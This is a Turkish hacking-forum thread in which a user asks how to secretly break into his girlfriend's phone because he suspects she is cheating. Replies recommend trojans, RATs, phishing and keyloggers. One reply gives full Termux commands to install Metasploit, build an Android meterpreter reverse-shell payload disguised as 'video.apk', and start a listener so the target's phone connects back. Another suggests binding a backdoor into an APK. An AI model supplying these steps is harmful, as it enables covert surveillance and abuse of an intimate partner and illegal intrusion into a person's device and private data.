Bir telefona nasıl sızabilirim

Krusway

Yeni üye
5 Haz 2022
4
1
Kiz arkadasimin beni aldattığını düşünüyorum ama ispatlayamıyotum gerçekten de şüphelendiğim bir kaç durum oldu söyledim ama hep inkar etti acaba telefonuna sızabilmemin bir yolu varmidir ?

BaşbuğBey

Katılımcı Üye
5 Nis 2022
289
113
Anıtkabir
Öncelikle internette satılan truva uygulamsaını kurabilirsin ya da kendin oluşturduğun rat'ı yükleyebilirsin bunun gibi başka yöntemlerde forumda
kodlama dili bilmeden uzaktan giremessin kolay kolay.

Krusway

Yeni üye
5 Haz 2022
4
1

Turkhackteam31

Yeni üye
16 May 2022
27
11
Öteki Taraf
Kiz arkadasimin beni aldattığını düşünüyorum ama ispatlayamıyotum gerçekten de şüphelendiğim bir kaç durum oldu söyledim ama hep inkar etti acaba telefonuna sızabilmemin bir yolu varmidir ?
Mobil den yapacaksan termux var dostum ordan toollar var mesela

Termuxu indirip açtıktan sonra yazmamız gerek birkaç komut var...

Pkg update && pkg update
Pkg install python2
Pkg install git
Pkg install Python
Bunları indirdikten sonra sırasıyla şunları yazıyoruz.

pkg install metasploite -y

kodu ile metasploiti yüklüyoruz

sonra bir trojan hazırlıyoruz

{msfvenom -p android/meterpreter/reverse_tcp lhost=ip adresiniz lport=portgirin R > /sdcard/video.apk}

enter tuşuna basıp trojanımızı hazırlıyoruz, burada sdcard telefondaki konumu video.apk ise trojan verdiğimiz isim TROJANI hedef telefona yollayıp açmasını sağlıyorsunuz (AMA BU CİD BİR SUÇTUR VE CEZASI VARDIR) onun için kendi telefonunuzda deneyin, daha sonra

msfconsole

kodu ile metasploite girip

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost=ip adresiniz

set lport=port no

run

enter diyip dinlemeye alıyoruz

Bilgisayardan Rat Atabilirsin örenk video
phishing oltalama yolu ile sosyal medya hesaplarına erişe bilirsin örnek video :Trojan ve Keylogger ile Şifre Çalma | CyberArts

Daeky

Uzman üye
16 Nis 2022
1,143
966
23
BJK
Backdoor Oluşturup Binder İşlemi Üzerinden Apk Uzantısına Entekre Etmen Gerekli Eğer Ki Zararlı Yazılım Üzerinden Sızmak İstiyorsan

Turkhackteam31

Yeni üye
16 May 2022
27
11
Öteki Taraf

who.rdl

Katılımcı Üye
17 Nis 2022
449
263
@MuammerCan Kader ortağım.
Rat Derken Keylogger Gibi Değil Sanırım, Pc Kullanıyorsan Çeşit Çeşit Program Bulunmakta.
Android İseniz Temruxunuza Metasploit kurup bakabilirsiniz Buraya Kurulumunu Atıyorum
Konu 'Termux Metasploit Kurulumu !' https://www.turkhackteam.org/konular/termux-metasploit-kurulumu.1987143/

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.